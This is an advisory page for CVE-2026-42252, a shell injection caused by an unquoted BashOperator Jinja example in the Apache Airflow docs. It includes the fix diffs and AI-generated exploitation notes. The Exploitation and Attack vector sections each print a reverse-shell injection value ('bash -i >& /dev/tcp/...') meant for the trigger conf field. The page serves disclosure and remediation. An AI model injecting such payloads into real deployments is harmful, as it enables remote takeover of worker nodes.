VYPR
← All advisories
Unrated severityNVD Advisory· Published Jun 1, 2026

CVE-2026-42252

CVE-2026-42252

Description

Apache Airflow docs showed an unquoted BashOperator Jinja example leading to shell injection via trigger API conf values.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Apache Airflow docs showed an unquoted BashOperator Jinja example leading to shell injection via trigger API conf values.

Vulnerability

The official Apache Airflow documentation page at core-concepts/dag-run.html provided an example of passing parameters when triggering DAGs that used the pattern BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}") without any quoting or sanitization warning (source: [1]). Dag authors who copied this exact verbatim pattern into deployments where users had Dag.can_trigger permission (common in multi-team setups and hosted offerings exposing a trigger API) could inadvertently open a shell-injection vulnerability. The code path allows a trigger user to supply malicious shell metacharacters in the conf field. Affected deployments include any Airflow version prior to the documentation correction in apache/airflow 3.2.2. The fix is captured in PR 64129 [1].

Exploitation

An authenticated attacker with the Dag.can_trigger permission on the affected DAG can craft a trigger request where the conf parameter contains shell metacharacters such as "; bash -i >& /dev/tcp/.../9999 0>&1; #". When the DAG runs the unquoted BashOperator command, the injected string is interpreted by the shell, leading to arbitrary command execution. No further user interaction or privileges are required beyond the trigger API access [1]. The pattern is a classic injection via unsanitized Jinja templating in a shell command.

Impact

Successful exploitation allows the attacker to execute arbitrary operating system commands as the Airflow worker user. This typically results in full compromise of the worker node, including data exfiltration, lateral movement, and potential persistence within the infrastructure. The confidentiality, integrity, and availability of the Airflow environment and its connected resources are at risk [1]. This vulnerability is part of a pattern similar to prior CVEs CVE-2025-50213 and CVE-2025-27018.

Mitigation

The documentation has been corrected in PR 64129 [1] and is included in the apache-airflow 3.2.2 release or later. Users should upgrade to version 3.2.2 or later to receive the corrected documentation. For existing deployments, users must audit DAG code for the unquoted pattern and apply shell quoting (e.g., using pipe or quote from shlex) or avoid passing untrusted conf values into BashOperator commands. No workaround is available if the pattern is already in use; the recommended fix is to update both the documentation and the DAG code.

References
  1. Docs: Fix inconsistency in documents when using `BashOperator` with Jinja templating by sjyangkevin · Pull Request #64129 · apache/airflow

AI Insight generated on Jun 1, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

2
af4f825962c0

update Dag Runs document under Core Concept to make it consistent with BashOperator document (#64129)

https://github.com/apache/airflowKevin YangMar 24, 2026via nvd-ref
commitPR #64129
1 file changed · +2 1
  • airflow-core/docs/core-concepts/dag-run.rst+2 1 modified
    @@ -271,7 +271,8 @@ Example of a parameterized Dag:
 
     parameterized_task = BashOperator(
         task_id="parameterized_task",
-        bash_command="echo value: {{ dag_run.conf['conf1'] }}",
+        bash_command="echo \"here is the message: '$message'\"",
+        env={"message": '{{ dag_run.conf["message"] if dag_run else "" }}'},
         dag=dag,
     )
cde4885818be

Updating release notes for 3.2.2rc3

https://github.com/apache/airflowvatsrahul1001May 26, 2026Fixed in 3.2.2via release-tag
commit
2 files changed · +5 4
  • RELEASE_NOTES.rst+3 2 modified
    @@ -24,7 +24,7 @@
 
 .. towncrier release notes start
 
-Airflow 3.2.2 (2026-05-27)
+Airflow 3.2.2 (2026-05-29)
 --------------------------
 
 Significant Changes
@@ -81,7 +81,8 @@ Significant Changes
 
 Bug Fixes
 ^^^^^^^^^
-
+- Fix ``Callback.handle_event`` triggerer crash when OpenTelemetry metrics receive dict typed tag values (#67527) (#67529)
+- UI: Rewrite ``modulepreload hrefs`` to the api-server static path (#67548) (#67556)
 - Correctly pre-allocate ``external_executor_id`` with multiple executors on PostgreSQL (#67388) (#67458)
 - Return raw import-error stacktrace when a Dag file has no registered Dag (#67465) (#67478)
 - UI: Fix Expand/Collapse All on XComs and Audit Log JSON cells (#67316) (#67361)
  • reproducible_build.yaml+2 2 modified
    @@ -1,2 +1,2 @@
-release-notes-hash: 6407b48d1054fe3ce68c09bf4435d91d
-source-date-epoch: 1779745327
+release-notes-hash: 504288db9a9dc13a0db859232fab98d0
+source-date-epoch: 1779811737

Vulnerability mechanics

Root cause

"The documentation example placed an unsanitized Jinja template expression (`dag_run.conf['conf1']`) directly into the `bash_command` string of `BashOperator`, allowing shell metacharacters from user-supplied `conf` values to reach `os.exec`."

Attack vector

An attacker who holds the `Dag.can_trigger` permission on a deployment whose Dag code was copied from the pre-correction documentation example can inject shell metacharacters via the `conf` field of the trigger API. Supplying a value such as `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` causes the unsanitized string to be interpolated into the `bash_command` argument, leading to arbitrary command execution on the worker node via `os.exec`. This is a template-injection-to-shell-injection chain [CWE-1336].

Affected code

The documentation file `airflow-core/docs/core-concepts/dag-run.rst` contained a verbatim `BashOperator` example that interpolated `dag_run.conf['conf1']` directly into a `bash_command` string without shell quoting or sanitization. The patch replaces that unsafe pattern with one that passes the user-supplied value through the `env` parameter, which is automatically shell-escaped by Airflow's execution environment.

What the fix does

The patch in [patch_id=4186404] replaces the unsafe `bash_command="echo value: {{ dag_run.conf['conf1'] }}"` pattern with `bash_command="echo \"here is the message: '$message'\""` combined with `env={"message": '{{ dag_run.conf["message"] if dag_run else "" }}'}`. By moving the user-controlled value into the `env` dictionary, Airflow's executor automatically applies proper shell escaping, preventing metacharacter injection. The commit message confirms the change makes the example consistent with the existing `BashOperator` documentation, which already uses the `env` pattern.

Preconditions

  • configThe target Dag's code must have been copied from the pre-correction documentation example, using unsanitized `{{ dag_run.conf['...'] }}` directly in `bash_command`.
  • authThe attacker must possess the `Dag.can_trigger` permission on the affected Dag.
  • networkThe attacker must be able to reach the trigger API (e.g., Airflow REST API or UI trigger endpoint).
  • inputThe attacker supplies a `conf` JSON payload containing shell metacharacters.

Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.